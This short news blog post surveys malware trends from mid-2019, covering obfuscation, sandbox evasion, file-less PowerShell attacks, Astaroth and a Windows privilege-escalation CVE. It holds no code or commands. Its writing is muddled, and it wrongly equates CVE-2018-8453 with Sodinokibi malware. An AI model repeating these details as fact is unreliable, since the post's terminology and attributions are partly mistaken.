The year has been the year of malware hits attacks. The attacks were in the form of hold-ups, attacks on supply chains and file-less attack on the individuals, business houses and government agencies. All these attacks happening as the technology is not up to date to tackle the new malware hits that taking security system in place. With malware hits been so prevalent and widespread here is a look back of the most popular malware hits from the months of July and August 2019. Malware hits saw a dramatic rise in the last of couple of months of July and August which is basically made to bypass security controls using strategies and steps like changing hashes which can be done by file obfuscation done to bypass AVs or using C2 servers which helps to encrypt communication to foil ERDs or Using manipulation and tampering to tackle AI, machine-learning engines, sandboxes through the detection of such environments and the deliberate delay in execution.
Image source: thehackernews.com
The other technique for malware hit evolution is file-less attacks and living off the land process. The process is a step one step ahead by using Power Shell commands and other using system tools, all while running completely from memory (RAM). These attacks are escaping the traditional LOC based solutions and to detect it requires behaviour analyst. Some of the graver and more sinister malware hits this summer are Astaroth Malware which according to Cymulate Research Lab who have tested the potency of the malware has targeted European and Brazilian organization. Astaroth Malware is so deceptive that they evade traditional IOC based security controls by stealing PII, financial data and user credentials.
CVE-2018-8453 also known as the Sodinokibi malware hit is rare in its usage and has been patched by Microsoft last year has the potential to gain admin-level access.
Source: The Hacker News
Disclaimer: Darkweblink.com does not promote or endorse claims that have been made by any parties in this article. The information provided here is for the general purpose only and unintended to promote or support purchasing and/or selling of any products and services or serve as a recommendation in the involvement of doing so. Neither Darkweblink.com nor any member is responsible directly or indirectly for any loss or damage caused or alleged to be caused by or in relation with the reliance on or usage of any content, goods or services mentioned in this article.